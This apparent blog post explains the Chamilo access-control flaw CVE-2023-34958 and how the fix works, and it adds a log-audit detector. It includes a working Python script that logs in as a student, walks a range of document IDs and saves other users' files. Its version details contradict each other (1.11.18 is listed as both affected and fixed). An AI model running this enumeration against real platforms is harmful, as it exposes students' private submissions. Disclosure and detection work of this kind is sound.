Chamilo is a widely used e-learning platform, popular in schools, universities, and businesses. Thousands rely on it to securely host courses, documents, and assignments. But a vulnerability disclosed as CVE-2023-34958 shows that, for several years, privacy in Chamilo wasn’t as solid as folks expected.

In this post, I’ll walk you through what went wrong, show you sample code, and share details about exploiting this vulnerability in Chamilo 1.11.* up to 1.11.18. If you’re a school IT admin, a Chamilo user, or a security enthusiast, read on.

What Is CVE-2023-34958?

At its heart, CVE-2023-34958 is an Incorrect Access Control vulnerability—a classic case of “if you know the magic key, you can get in.” In affected versions of Chamilo, if you’re a student enrolled in a course and you know another student’s document ID, you can download their file. No special permissions needed. No teacher involved.

Official Advisory

- NVD - CVE-2023-34958
- Chamilo Security Advisory

How Did This Happen?

Chamilo has a feature letting students upload and download course-related files. These files are stored with unique IDs and are supposed to be private, or at least only visible to a specific group.

But the code that handles downloads only checked if the requesting user was enrolled in the same course—not if the file *belonged* to them.

So if Student Alice uploads “AliceEssay.docx” and it’s assigned, for example, document ID 1745, any other student, say Bob, can download it if he knows 1745.

Chamilo’s URL structure for downloads looks something like this:

https://chamilo.example.edu/main/document/download.php?doc_id=1745

If Bob plugs in Alice’s doc ID, he gets the file.


Suppose Bob wants to try document IDs from 170 to 180:

```python
import requests

session = requests.Session()
# Replace with real Chamilo credentials and login URL
login_url = "https://chamilo.example.edu/main/auth/login.php"
payload = {'login': 'bob', 'password': 'bob_password'}

# Log in and keep session cookies
response = session.post(login_url, data=payload)
if "Logout" in response.text:
    print("Logged in!")

    # Try each doc_id in given range
    for doc_id in range(170, 180):
        dl_url = f"https://chamilo.example.edu/main/document/download.php?doc_id={doc_id}"
        r = session.get(dl_url)
        if r.headers.get("Content-Type", "").startswith("application/"):
            print(f"Leaked file found at doc_id={doc_id}")
            with open(f"doc_{doc_id}", "wb") as out_file:
                out_file.write(r.content)
else:
    print("Failed to log in.")
```

What does this script do?
It logs in as Bob, pokes Chamilo’s download handler for each doc_id, and saves any real files it finds.

Why Is This a Big Deal?

It’s more than a privacy breach. Students trust that only teachers (and maybe groupmates) can see their submissions. With this bug, anyone in a course could download and misuse:

- Any uploaded file, intentional or not

In an academic or medical context, this could be a major GDPR or FERPA violation.

How Was It Fixed?

Chamilo 1.11.18 plugged this hole. Now, the download handler checks whether you are allowed to access the specific file before sending it.

Here’s a simplified fixed code example (PHP-like pseudocode):

```php
// Old code
if (user_is_subscribed_to_course($course_id)) {
    serve_file($file_id);
}

// New code
if (user_can_access_document($user_id, $file_id)) {
    serve_file($file_id);
}
```

*Now, user_can_access_document checks document ownership and permissions, not just course subscription.*

- Audit your logs – Check for unusual download activity around document IDs.
- Limit document visibility – Use group assignments where possible, and minimize cross-user document access.

- Don’t try accessing others’ files—it’s likely illegal and definitely unethical.
- Notify your IT/admins if you spot strange behaviors.
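
One way to carry out the log audit suggested above, as an added example that is not from the original post or from Chamilo: it scans web access logs for clients that request many consecutive `doc_id` values from the download handler. It assumes common/combined log format, groups requests by client IP, and uses the URL shape quoted earlier; the function names, thresholds, and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Access-log line for the download handler; path and doc_id follow the URL shape in the post.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"GET /main/document/download\.php\?(?:[^" ]*&)?doc_id=(?P<doc>\d+)[^"]*" '
    r'(?P<status>\d{3}) '
)

def longest_run(ids):
    """Length of the longest run of consecutive integers in ids."""
    best, run, prev = 0, 0, None
    for i in sorted(set(ids)):
        run = run + 1 if prev is not None and i == prev + 1 else 1
        best, prev = max(best, run), i
    return best

def find_enumeration(lines, min_distinct=5, min_run=4):
    """Return {client: stats} for clients whose doc_id requests look like a sweep."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            seen[m["client"]].append((int(m["doc"]), m["status"]))
    flagged = {}
    for client, hits in seen.items():
        ids = [d for d, _ in hits]
        stats = {
            "distinct_ids": len(set(ids)),
            "longest_run": longest_run(ids),
            "served": sorted({d for d, s in hits if s == "200"}),
        }
        if stats["distinct_ids"] >= min_distinct and stats["longest_run"] >= min_run:
            flagged[client] = stats
    return flagged

# Constructed sample log lines (documentation IP ranges), not real data.
SAMPLE = [
    f'198.51.100.7 - - [08/Jun/2023:10:00:{i:02d} +0000] '
    f'"GET /main/document/download.php?doc_id={170 + i} HTTP/1.1" '
    f'{"200" if i in (2, 5) else "403"} 512'
    for i in range(10)
] + [
    '203.0.113.20 - - [08/Jun/2023:10:05:00 +0000] '
    '"GET /main/document/download.php?doc_id=1745 HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    print(find_enumeration(SAMPLE))
```

The `served` list holds the IDs that came back with status 200, which is the set of documents to review with their owners when scoping an incident.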


Final Thoughts

Incorrect access control bugs like CVE-2023-34958 are among the most impactful and easy to overlook. When platforms don’t check permissions at the right level, private data can leak—even if the rest of the system looks secure.

Always keep your software updated, and remember: privacy by design is not a feature, it’s a necessity.


*This post is an original, simplified explanation based on public reporting, project updates, and hands-on research. Be responsible with this knowledge!*

Timeline

Published on: 06/08/2023 19:15:00 UTC
Last modified on: 06/15/2023 17:30:00 UTC